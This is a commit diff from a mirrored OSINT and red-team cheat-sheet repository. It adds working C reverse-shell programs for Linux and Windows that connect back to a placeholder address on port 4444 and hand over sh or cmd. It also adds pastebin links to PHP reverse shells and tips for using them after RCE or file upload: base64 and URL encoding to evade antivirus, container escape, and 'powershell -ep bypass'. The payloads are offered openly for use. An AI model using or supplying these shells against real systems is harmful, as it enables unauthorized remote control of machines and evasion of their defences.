mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-05 20:40:30 -08:00
added resouces and scripts
This commit is contained in:
@@ -4,7 +4,7 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it 3.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
|
||||
## Script 1
|
||||
|
||||
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
@@ -0,0 +1,84 @@
|
||||
# TIPS
|
||||
|
||||
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
|
||||
## C script spawning shell
|
||||
|
||||
``` Linux
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
int main(void){
|
||||
int port = 4444;
|
||||
struct sockaddr_in revsockaddr;
|
||||
|
||||
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||
revsockaddr.sin_family = AF_INET;
|
||||
revsockaddr.sin_port = htons(port);
|
||||
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
|
||||
|
||||
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||
sizeof(revsockaddr));
|
||||
dup2(sockt, 0);
|
||||
dup2(sockt, 1);
|
||||
dup2(sockt, 2);
|
||||
|
||||
char * const argv[] = {"sh", NULL};
|
||||
execvp("sh", argv);
|
||||
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
## C spawning cmd
|
||||
|
||||
```Windows
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
int main(void){
|
||||
int port = 4444;
|
||||
struct sockaddr_in revsockaddr;
|
||||
|
||||
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||
revsockaddr.sin_family = AF_INET;
|
||||
revsockaddr.sin_port = htons(port);
|
||||
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
|
||||
|
||||
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||
sizeof(revsockaddr));
|
||||
dup2(sockt, 0);
|
||||
dup2(sockt, 1);
|
||||
dup2(sockt, 2);
|
||||
|
||||
char * const argv[] = {"cmd", NULL};
|
||||
execvp("cmd", argv);
|
||||
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
*Pro tips
|
||||
|
||||
- If you was gett the shell, change to powershell, you can run
|
||||
|
||||
```
|
||||
powershell -ep bypass
|
||||
```
|
||||
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# TIPS
|
||||
|
||||
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
## Php spawning cmd
|
||||
|
||||
```Windows
|
||||
https://pastebin.com/bFqVuGwv
|
||||
```
|
||||
|
||||
## Php spawning bash
|
||||
|
||||
```Linux
|
||||
https://pastebin.com/QsSKm2F1
|
||||
```
|
||||
@@ -4,8 +4,9 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it 3.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
## Script 1
|
||||
|
||||
|
||||
@@ -1,3 +1,16 @@
|
||||
# Red Teaming
|
||||
|
||||
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
||||
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
||||
|
||||
## Tips Reverse Shell
|
||||
|
||||
1. Check the operating system target
|
||||
2. Check the network or internet access on the target (internet access opened)
|
||||
3. Cehck the vuln, you can check it by run the command like sleep, delay or trying to wget on your local machine
|
||||
4. Check is it a sandbox like in a container? Or directly to the operating system. If it's a container then you have to bypass
|
||||
5. Check the installed software on the target
|
||||
6. Check the compiler on the target
|
||||
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
||||
8. Change the port listener to bigger
|
||||
|
||||
## Soon will added (tamplate )
|
||||
@@ -1,6 +1,7 @@
|
||||
# Awesome Collection Sentinel Script
|
||||
|
||||
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
|
||||
- [sentinel custom script Github](https://github.com/sentinel-hub/custom-scripts)
|
||||
|
||||
# Guide
|
||||
|
||||
|
||||
Reference in New Issue
Block a user